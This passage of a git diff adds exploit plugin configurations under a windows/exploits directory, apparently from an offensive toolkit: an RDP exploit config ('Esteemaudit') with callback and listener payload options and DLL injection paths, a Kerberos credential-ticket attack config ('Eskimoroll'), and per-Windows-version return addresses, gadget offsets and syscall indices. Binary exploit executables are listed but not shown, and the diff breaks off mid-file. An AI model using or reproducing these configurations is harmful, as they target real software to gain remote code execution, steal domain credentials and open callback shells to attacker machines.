<t:parameter name="SysCallAddr" description="" type="U32" value="0x7FFE0300" hidden="true"/>
|
||||
<t:parameter name="JumpEbx" description="" type="U32" value="0x00011740" hidden="true"/>
|
||||
<t:parameter name="JumpEbxPadding" description="" type="U32" value="0x00000010" hidden="true"/>
|
||||
<t:parameter name="Ret14" description="" type="U32" value="0x0000692d" hidden="true"/>
|
||||
<t:parameter name="JumpEsp" description="" type="U32" value="0x00011899" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="W2K3SP0" description="Windows 2003 SP0">
|
||||
<t:parameter name="EggOffset" description="" type="U32" value="0x28" hidden="true"/>
|
||||
<t:parameter name="RsaenhBase" description="" type="U32" value="0" hidden="true"/>
|
||||
<t:parameter name="MaxEggSize" description="" type="U32" value="0x06B0" hidden="true"/>
|
||||
<t:parameter name="LockStackOffset" description="" type="U32" value="0x00E0" hidden="true"/>
|
||||
<t:parameter name="InitialRetAddr" description="" type="U32" value="0x0FFEF4C9" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="W2K3SP1" description="Windows 2003 SP1">
|
||||
<t:parameter name="EggOffset" description="" type="U32" value="0xC4" hidden="true"/>
|
||||
<t:parameter name="RsaenhBase" description="" type="U32" value="0x68000000" hidden="true"/>
|
||||
<t:parameter name="MaxEggSize" description="" type="U32" value="0x06B0" hidden="true"/>
|
||||
<t:parameter name="LockStackOffset" description="" type="U32" value="0x0170" hidden="true"/>
|
||||
<t:parameter name="InitialRetAddr" description="" type="U32" value="0x00015BD8" hidden="true"/>
|
||||
<t:parameter name="RwAddress" description="" type="U32" value="0x0002BA08" hidden="true"/>
|
||||
<t:parameter name="ZeroEax" description="" type="U32" value="0x00012CE6" hidden="true"/>
|
||||
<t:parameter name="MovEspEax" description="" type="U32" value="0x00015CF4" hidden="true"/>
|
||||
<t:parameter name="StoreEaxEcx" description="" type="U32" value="0x00011EB9" hidden="true"/>
|
||||
<t:parameter name="SkipJunk" description="" type="U32" value="0x00015D8B" hidden="true"/>
|
||||
<t:parameter name="GetVProtIndex" description="" type="U32" value="0x000092A1" hidden="true"/>
|
||||
<t:parameter name="vProtIndex" description="" type="U32" value="0x0000008F" hidden="true"/>
|
||||
<t:parameter name="vProtPadding" description="" type="U32" value="0x00000008" hidden="true"/>
|
||||
<t:parameter name="SetupEbx" description="" type="U32" value="0x00015D8D" hidden="true"/>
|
||||
<t:parameter name="SysCallAddr" description="" type="U32" value="0x7FFE0300" hidden="true"/>
|
||||
<t:parameter name="JumpEbx" description="" type="U32" value="0x0001227B" hidden="true"/>
|
||||
<t:parameter name="Ret14" description="" type="U32" value="0x0000694E" hidden="true"/>
|
||||
<t:parameter name="JumpEsp" description="" type="U32" value="0x000123D4" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="W2K3SP2" description="Windows 2003 SP2">
|
||||
<t:parameter name="EggOffset" description="" type="U32" value="0xC4" hidden="true"/>
|
||||
<t:parameter name="RsaenhBase" description="" type="U32" value="0x68000000" hidden="true"/>
|
||||
<t:parameter name="MaxEggSize" description="" type="U32" value="0x06B0" hidden="true"/>
|
||||
<t:parameter name="LockStackOffset" description="" type="U32" value="0x0170" hidden="true"/>
|
||||
<t:parameter name="InitialRetAddr" description="" type="U32" value="0x00015F8B" hidden="true"/>
|
||||
<t:parameter name="RwAddress" description="" type="U32" value="0x000312C0" hidden="true"/>
|
||||
<t:parameter name="ZeroEax" description="" type="U32" value="0x00012F87" hidden="true"/>
|
||||
<t:parameter name="MovEspEax" description="" type="U32" value="0x000160A4" hidden="true"/>
|
||||
<t:parameter name="StoreEaxEcx" description="" type="U32" value="0x00012121" hidden="true"/>
|
||||
<t:parameter name="SkipJunk" description="" type="U32" value="0x0001613B" hidden="true"/>
|
||||
<t:parameter name="GetVProtIndex" description="" type="U32" value="0x00009391" hidden="true"/>
|
||||
<t:parameter name="vProtIndex" description="" type="U32" value="0x0000008F" hidden="true"/>
|
||||
<t:parameter name="vProtPadding" description="" type="U32" value="0x00000008" hidden="true"/>
|
||||
<t:parameter name="SetupEbx" description="" type="U32" value="0x0001613D" hidden="true"/>
|
||||
<t:parameter name="SysCallAddr" description="" type="U32" value="0x7FFE0300" hidden="true"/>
|
||||
<t:parameter name="JumpEbx" description="" type="U32" value="0x000124E3" hidden="true"/>
|
||||
<t:parameter name="Ret14" description="" type="U32" value="0x00009946" hidden="true"/>
|
||||
<t:parameter name="JumpEsp" description="" type="U32" value="0x0001263C" hidden="true"/>
|
||||
</t:paramgroup>
|
||||
</t:paramchoice>
|
||||
</t:inputparameters>
|
||||
|
||||
|
||||
<t:outputparameters>
|
||||
<t:parameter name="Contract"
|
||||
description="The contract fulfilled by this plugin"
|
||||
type="String"
|
||||
value="StagedUpload"/>
|
||||
<t:parameter name="XorMask"
|
||||
description=""
|
||||
type="U8"/>
|
||||
<t:parameter name="ConnectedTcp"
|
||||
description="Connected TCP Socket to target"
|
||||
type="Socket"/>
|
||||
</t:outputparameters>
|
||||
|
||||
<t:redirection>
|
||||
<t:local protocol="TCP"
|
||||
listenaddr="TargetIp"
|
||||
listenport="TargetPort"
|
||||
destaddr="//identifier"
|
||||
destport="//service[name='rpc']/port"
|
||||
closeoncompletion="true"/>
|
||||
<t:local protocol="TCP"
|
||||
listenaddr="TargetIp"
|
||||
listenport="CallbackPort"
|
||||
destaddr="//identifier"
|
||||
destport="CallbackPort"
|
||||
closeoncompletion="true"/>
|
||||
<t:remote protocol="TCP"
|
||||
listenaddr="CallbackIp"
|
||||
listenport="CallbackPort"
|
||||
destport="CallbackPort"/>
|
||||
</t:redirection>
|
||||
|
||||
<t:logic>
|
||||
<t:and>
|
||||
<t:service name="rpc">
|
||||
<t:bindtopath name="TargetPort" path="//service[name='rpc']/port"/>
|
||||
</t:service>
|
||||
<t:or>
|
||||
<!--
|
||||
<t:os family="windows" name="Windows XP" servicepack="0">
|
||||
<t:bindtovalue name="Target" value="XPSP0"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows XP" servicepack="1">
|
||||
<t:bindtovalue name="Target" value="XPSP1"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows XP" servicepack="2">
|
||||
<t:bindtovalue name="Target" value="XPSP2"/>
|
||||
</t:os>
|
||||
-->
|
||||
<t:os family="windows" name="Windows XP" servicepack="3">
|
||||
<t:bindtovalue name="Target" value="XPSP3"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows 2003" servicepack="0">
|
||||
<t:bindtovalue name="Target" value="W2K3SP0"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows 2003" servicepack="1">
|
||||
<t:bindtovalue name="Target" value="W2K3SP1"/>
|
||||
</t:os>
|
||||
<t:os family="windows" name="Windows 2003" servicepack="2">
|
||||
<t:bindtovalue name="Target" value="W2K3SP2"/>
|
||||
</t:os>
|
||||
</t:or>
|
||||
<t:not>
|
||||
<t:os architecture="x86 64-bit"/>
|
||||
</t:not>
|
||||
<t:bindtovalue name="Payload" value="Callback"/>
|
||||
</t:and>
|
||||
</t:logic>
|
||||
|
||||
</t:config>
|
||||
BIN
windows/exploits/Erraticgopher-1.0.1.exe
Normal file
BIN
windows/exploits/Erraticgopher-1.0.1.exe
Normal file
Binary file not shown.
21
windows/exploits/Eskimoroll-1.1.1.0.fb
Normal file
21
windows/exploits/Eskimoroll-1.1.1.0.fb
Normal file
|
|
@ -0,0 +1,21 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="b312630cfabfbb7572a55a75e213eff54be451e1"
|
||||
name="Eskimoroll"
|
||||
version="1.1.1"
|
||||
configversion="1.1.1.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
|
||||
<t:touchlist>
|
||||
<t:plugin name="Domaintouch"
|
||||
displayname="Domain Touch"
|
||||
description="Eskimoroll domain information touch">
|
||||
<t:oparam name="DomainDns" value="DomainDns"/>
|
||||
<t:oparam name="DomainSid" value="DomainSid"/>
|
||||
<t:oparam name="CredentialType" value="CredentialType"/>
|
||||
<t:oparam name="Credential" value="Credential"/>
|
||||
<t:oparam name="Username" value="Username"/>
|
||||
</t:plugin>
|
||||
</t:touchlist>
|
||||
|
||||
</t:config>
|
||||
148
windows/exploits/Eskimoroll-1.1.1.0.xml
Normal file
148
windows/exploits/Eskimoroll-1.1.1.0.xml
Normal file
|
|
@ -0,0 +1,148 @@
|
|||
<?xml version="1.0"?>
|
||||
<t:config id="b312630cfabfbb7572a55a75e213eff54be451e1"
|
||||
name="Eskimoroll"
|
||||
version="1.1.1"
|
||||
configversion="1.1.1.0"
|
||||
xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
|
||||
xmlns:t='tc0'>
|
||||
|
||||
<t:inputparameters>
|
||||
<t:parameter name="NetworkTimeout"
|
||||
description="Timeout for blocking network calls (in seconds)"
|
||||
type="S16"
|
||||
default="60"/>
|
||||
<t:parameter name="TargetIp"
|
||||
description="Domain Controller's IP address"
|
||||
type="IPv4"
|
||||
binding="//identifier"/>
|
||||
<t:parameter name="TargetPort"
|
||||
description="Port used by the Kerberos service"
|
||||
type="TcpPort"
|
||||
binding="//service[name='kerberos']/port"
|
||||
default="88"/>
|
||||
|
||||
<t:parameter name="Delay"
|
||||
description="Time to wait between packets (in seconds)"
|
||||
type="S32"
|
||||
default="0"/>
|
||||
<t:parameter name="TicketFile"
|
||||
description="Local file to store ticket (leave blank for in-memory only)"
|
||||
type="String"
|
||||
default=""/>
|
||||
|
||||
<t:parameter name="TargetMachine"
|
||||
description="Target's NetBIOS name (in Unicode)"
|
||||
type="UString"/>
|
||||
<t:parameter name="DomainDns"
|
||||
description="DNS name of the domain being exploited (in Unicode)"
|
||||
type="UString"/>
|
||||
<t:parameter name="DomainSid"
|
||||
description="SID of the domain being exploited (e.g., S-1-5-21-XXXX-XXXX)"
|
||||
type="String"/>
|
||||
|
||||
<t:paramchoice name="CredentialType"
|
||||
description="Password, password hash, ticket, etc">
|
||||
<t:paramgroup name="UnicodeCreds"
|
||||
description="Unicode encoded credentials">
|
||||
<t:parameter name="Username"
|
||||
description="Username entered as hex bytes (in Unicode)"
|
||||
type="UString"/>
|
||||
<t:parameter name="Credential"
|
||||
description="Unicode password entered as hex bytes (in Unicode)"
|
||||
type="UString"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="PasswordHash"
|
||||
description="Password hash">
|
||||
<t:parameter name="Username"
|
||||
description="Username entered as hex bytes (in Unicode)"
|
||||
type="UString"/>
|
||||
<t:parameter name="Credential"
|
||||
description="Hash of user/machine password entered as hex bytes"
|
||||
type="UString"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="MachineHash"
|
||||
description="Credentials for the domain computer, obtained from lsadump">
|
||||
<t:parameter name="Username"
|
||||
description="Machine's name, with trailing '$' character, in UNICODE"
|
||||
type="UString"/>
|
||||
<t:parameter name="Credential"
|
||||
description="Machine hash obtained from lsadump, entered as HEX bytes."
|
||||
type="UString"/>
|
||||
</t:paramgroup>
|
||||
</t:paramchoice>
|
||||
</t:inputparameters>
|
||||
|
||||
<t:outputparameters>
|
||||
<t:paramchoice name="CredentialType"
|
||||
description="Password, password hash, ticket, etc">
|
||||
<t:paramgroup name="UnicodeCreds"
|
||||
description="Unicode encoded credentials">
|
||||
<t:parameter name="Username"
|
||||
description="Username entered as hex bytes (in Unicode)"
|
||||
type="UString"/>
|
||||
<t:parameter name="Credential"
|
||||
description="Unicode password entered as hex bytes (in Unicode)"
|
||||
type="UString"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="PasswordHash"
|
||||
description="Password hash">
|
||||
<t:parameter name="Username"
|
||||
description="Username entered as hex bytes (in Unicode)"
|
||||
type="UString"/>
|
||||
<t:parameter name="Credential"
|
||||
description="Hash of user/machine password entered as hex bytes"
|
||||
type="UString"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="MachineHash"
|
||||
description="Credentials for the domain computer, obtained from lsadump">
|
||||
<t:parameter name="Username"
|
||||
description="Machine's name, with trailing '$' character, in UNICODE"
|
||||
type="UString"/>
|
||||
<t:parameter name="Credential"
|
||||
description="Machine hash obtained from lsadump, entered as HEX bytes."
|
||||
type="UString"/>
|
||||
</t:paramgroup>
|
||||
|
||||
<t:paramgroup name="KerberosTicket"
|
||||
description="Kerberos ticket for target machine">
|
||||
<t:parameter name="Username"
|
||||
description="Name of the user who owns the Kerberos ticket (in Unicode)"
|
||||
type="UString"/>
|
||||
<t:parameter name="DomainDns"
|
||||
description="DNS name of the domain being exploited (in Unicode)"
|
||||
type="UString"/>
|
||||
<t:parameter name="KerberosTicket"
|
||||
description="Kerberos ticket with necessary privileges"
|
||||
type="UString"/>
|
||||
<t:parameter name="SessionKey"
|
||||
description="Encryption key used in the Kerberos ticket"
|
||||
type="UString"/>
|
||||
</t:paramgroup>
|
||||
<t:paramgroup name="KerberosFile"
|
||||
description="Kerberos ticket from disk">
|
||||
<t:parameter name="TicketFile"
|
||||
description="Local file holding Kerberos ticket"
|
||||
type="LocalFile"/>
|
||||
</t:paramgroup>
|
||||
</t:paramchoice>
|
||||
</t:outputparameters>
|
||||
|
||||
<t:redirection>
|
||||
<t:local protocol="TCP"
|
||||
listenaddr="TargetIp"
|
||||
listenport="TargetPort"
|
||||
destaddr="//identifier"
|
||||
destport="//service[name='smb']/port"
|
||||
closeoncompletion="true"/>
|
||||
</t:redirection>
|
||||
|
||||
<t:logic>
|
||||
<t:or>
|
||||
<t:os family="windows" name="Windows 2000" osclass="Server"/>
|
||||
<t:os family="windows" name="Windows 2003"/>
|
||||
<t:os family="windows" name="Windows 2003 R2"/>
|
||||
<t:os family="windows" name="Windows 2008"/>
|
||||
<t:os family="windows" name="Windows 2008 R2" version="Free"/>
|
||||
</t:or>
|
||||
</t:logic>
|
||||
</t:config>
|
||||
BIN
windows/exploits/Eskimoroll-1.1.1.exe
Normal file
BIN
windows/exploits/Eskimoroll-1.1.1.exe
Normal file
Binary file not shown.
866
windows/exploits/Esteemaudit-2.1.0.0.xml
Normal file
866
windows/exploits/Esteemaudit-2.1.0.0.xml
Normal file
|
|
@ -0,0 +1,866 @@
|
|||
<?xml version='1.0' encoding='utf-8'?>
|
||||
<config xmlns='urn:trch' name='Esteemaudit' version='2.1.0' schemaversion='2.1.0' configversion='2.1.0.0' id='2a7d82545aa7bdf8b44ee403dbebf2b360f55b3a'>
|
||||
<inputparameters>
|
||||
<parameter type='IPv4' name='TargetIp' description='Target IP Address'/>
|
||||
<parameter type='TcpPort' name='TargetPort' description='Port used by the RDP service'>
|
||||
<default>3389</default>
|
||||
</parameter>
|
||||
<parameter type='S16' name='NetworkTimeout' description='Timeout for connect() calls including egg callback'>
|
||||
<default>60</default>
|
||||
</parameter>
|
||||
<parameter type='S16' name='PacketTimeout' description='Timeout for each RDP packet.'>
|
||||
<default>10</default>
|
||||
</parameter>
|
||||
<parameter type='U32' name='MaxProcessCount' description='The maximum number of RDP process loops to allow'>
|
||||
<default>300</default>
|
||||
</parameter>
|
||||
<parameter type='U32' name='RdpLibHertz' description='Extrapolated RdpLib processing cycles per second.'>
|
||||
<default>30</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='Boolean' name='SendSpacebar' description='Whether to send spacebar to clear legal text caption or not'>
|
||||
<default>true</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ProcessCountToSendSpaceOn' description='Process loop to clear the legal text caption on'>
|
||||
<default>3</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='MaxRDPLibErrorCount' description='Maximum number of RDPLib errors to allow'>
|
||||
<default>3</default>
|
||||
</parameter>
|
||||
<paramchoice name='Payload' description='How the egg will behave'>
|
||||
<default>Callback</default>
|
||||
<paramgroup name='Callback' description='The egg will callback to the specified IP and Port'>
|
||||
<parameter type='IPv4' name='CallbackIp' description='Callback IP address the egg will connect to from target'/>
|
||||
<parameter type='TcpPort' name='CallbackPort' description='Callback port that the egg will connect to from target'>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter required='false' type='TcpPort' name='CallbackLocalPort' description='Callback port that we will listen on to receive the eggs connection'/>
|
||||
</paramgroup>
|
||||
<paramgroup name='Listener' description='The egg will open up a new listening port.'>
|
||||
<parameter type='TcpPort' name='ListenPort' description='Port the egg will listen on'/>
|
||||
<parameter required='false' type='TcpPort' name='CallinPort' description='Port we connect to'/>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
<paramchoice name='Architecture' description='Architecture of the target'>
|
||||
<paramgroup name='x86' description='Target is running on an x86 processor'>
|
||||
<parameter type='LocalFile' name='MigrateProcessDLL' description=' The DLL that will be used to inject into a remote process'>
|
||||
<default>D:\DSZOPSDISK\storage\rudo_x86.dll</default>
|
||||
</parameter>
|
||||
<parameter type='LocalFile' name='CallbackPayloadDLL' description='The DLL that will be used as a callback payload'>
|
||||
<default>D:\DSZOPSDISK\storage\capa_x86.dll</default>
|
||||
</parameter>
|
||||
<parameter type='LocalFile' name='ListenPayloadDLL' description='The DLL that will be used as a listen payload'>
|
||||
<default>D:\DSZOPSDISK\storage\lipa_x86.dll</default>
|
||||
</parameter>
|
||||
<paramchoice name='Target' description='OS and Service pack of the target'>
|
||||
<paramgroup name='XPSP0' description='Windows XP SP0'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0fe370b0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0fe37120</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FE372B0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF94DB0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FE21178</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FE211A8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000011</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000053</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='XPSP1' description='Windows XP SP1'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0fe370b0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0fe37120</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FE372B0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF94DB0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FE21178</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FE211A8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000011</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000053</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='XPSP0|1' description='Windows XP SP0 or SP1'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0fe370b0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0fe37120</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FE372B0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF94DB0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FE21178</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FE211A8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000011</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000053</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='XPSP2' description='Windows XP SP2'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0fe370b0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0fe25158</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0x0fe2ab2d</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0x0fe27243</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0x0fe27243</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0x0fe266b8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0x00004000</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x00000089</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0fe3342a</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x44</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FE372B0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF94DB0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FE21178</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FE211A8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000011</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000053</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='XPSP3' description='Windows XP SP3'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0fe370b0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0fe25158</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0x0fe2ab2d</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0x0fe27243</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0x0fe27243</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
